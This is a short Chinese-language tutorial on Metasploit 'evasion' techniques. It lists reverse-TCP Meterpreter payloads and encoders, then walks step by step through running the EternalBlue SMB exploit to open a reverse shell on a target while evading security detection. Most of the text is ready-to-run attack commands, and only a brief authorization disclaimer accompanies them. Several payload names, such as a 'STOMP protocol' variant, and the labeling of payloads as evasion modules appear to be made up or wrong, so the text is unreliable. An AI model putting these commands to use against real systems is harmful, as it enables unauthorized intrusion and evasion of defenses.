Metasploit框架的evasion模块用于生成绕过安全检测的有效载荷。以下是一些常见的evasion模块及其使用案例:
1. 通用Evasion模块
-
windows/meterpreter/reverse_tcp_rc4:使用RC4加密的反向TCP Meterpreter会话。set PAYLOAD windows/meterpreter/reverse_tcp_rc4 set LHOST 192.168.1.2 set LPORT 4444 -
windows/meterpreter/reverse_tcp_uuid:使用UUID生成器的反向TCP Meterpreter会话。set PAYLOAD windows/meterpreter/reverse_tcp_uuid set LHOST 192.168.1.2 set LPORT 4444
2. 编码和混淆Evasion模块
-
x86/shikata_ga_nai:使用Shikata Ga Nai算法进行XOR编码。set ENCODER x86/shikata_ga_nai -
x86/countdown:使用递减计数器进行编码。set ENCODER x86/countdown
3. 特定平台Evasion模块
-
windows/x64/meterpreter/reverse_tcp_stomp:使用STOMP协议的反向TCP Meterpreter会话。set PAYLOAD windows/x64/meterpreter/reverse_tcp_stomp set LHOST 192.168.1.2 set LPORT 4444 -
linux/x86/meterpreter/reverse_tcp_lzma:使用LZMA压缩的反向TCP Meterpreter会话。set PAYLOAD linux/x86/meterpreter/reverse_tcp_lzma set LHOST 192.168.1.2 set LPORT 4444
使用案例
假设你想利用一个Windows漏洞来获取远程控制,并且希望绕过安全检测,你可以按照以下步骤操作:
-
选择合适的
exploit模块:use exploit/windows/smb/ms17_010_eternalblue -
设置目标IP:
set RHOSTS 192.168.1.1 -
选择合适的
payload模块:set PAYLOAD windows/meterpreter/reverse_tcp_rc4 -
设置本地监听地址和端口:
set LHOST 192.168.1.2 set LPORT 4444 -
运行模块:
run
注意事项
- 使用这些模块时,请确保你有合法的权限和目的。
- 避免在未经授权的系统上进行测试,以免违反法律或政策。
通过这些模块和案例,你可以生成绕过安全检测的有效载荷,从而提高渗透测试的成功率。
